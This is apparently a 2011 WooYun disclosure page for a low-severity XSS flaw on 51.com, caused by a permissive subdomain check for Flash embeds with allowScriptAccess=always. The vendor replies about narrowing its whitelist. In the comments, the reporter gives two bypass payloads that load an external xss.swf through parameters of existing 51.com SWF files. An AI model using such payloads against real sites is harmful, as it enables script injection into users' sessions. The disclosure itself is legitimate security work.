当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2011-01952

漏洞标题:51.com XSS Ⅲ

相关厂商:51.com

漏洞作者: jsbug

提交时间:2011-04-21 16:51

修复时间:2011-05-21 18:00

公开时间:2011-05-21 18:00

漏洞类型:xss跨站脚本攻击

危害等级:低

自评Rank:3

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2011-04-21: 细节已通知厂商并且等待厂商处理中
2011-04-22: 厂商已经确认,细节仅向厂商公开
2011-05-02: 细节向核心白帽子及相关领域专家公开
2011-05-12: 细节向普通白帽子公开
2011-05-22: 细节向实习白帽子公开
2011-05-21: 细节向公众公开

简要描述:

我又来了- -!5D
setUserSWF函数判断域名,51.com子域名下allowScriptAccess=always

详细说明:

function isDoMain(a){if(/^http\:\/\/tj\.51\.com\/.+?/.test(a)){return false;}return/^http\:\/\/[0-9a-z]+\.51\.com\/.+?/.test(a);}

漏洞证明:

修复方案:

版权声明:转载请注明来源 jsbug@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:3

确认时间:2011-04-22 16:52

厂商回复:

收到,多谢jsbug。

最新状态:

暂无


漏洞评价:

评论

  1. 2011-04-22 17:34 | jsbug ( 普通白帽子 | Rank:117 漏洞数:16 )

    白名单可能会更好,除了mtv.51.com有必要留下外.当然要注意MTV下flash引入的参数.毕竟二级域名也太多了点,这很难控制.比如下面的就会绕过:[movie=http://mms.51.com/mms/action.swf?imageUrl=http://x.com/xss.swf]

  2. 2011-04-25 14:10 | 51.com(乌云厂商)

    再次感谢jsbug大牛,上周简单处理了一下,也想做白名单,域名太多。今天讨论后处理了一下,还是按最少的白名单处理,有问题再一个一个解决。

  3. 2011-04-27 14:43 | jsbug ( 普通白帽子 | Rank:117 漏洞数:16 )

    [movie=http://pic.51.com/v3/home/images/photoviewer.swf?photos=http://xx.com/xss.swf,/jsbug.html&mode=0]pic和pic2下面的FLASH太多了点.

  4. 2011-04-28 11:38 | 51.com(乌云厂商)

    多谢jsbug,辛苦了哈。历史原因导致pic上文件相当多,有小部分还有在用,讨论、纠结之后还是从白名单中移除了pic, pic2。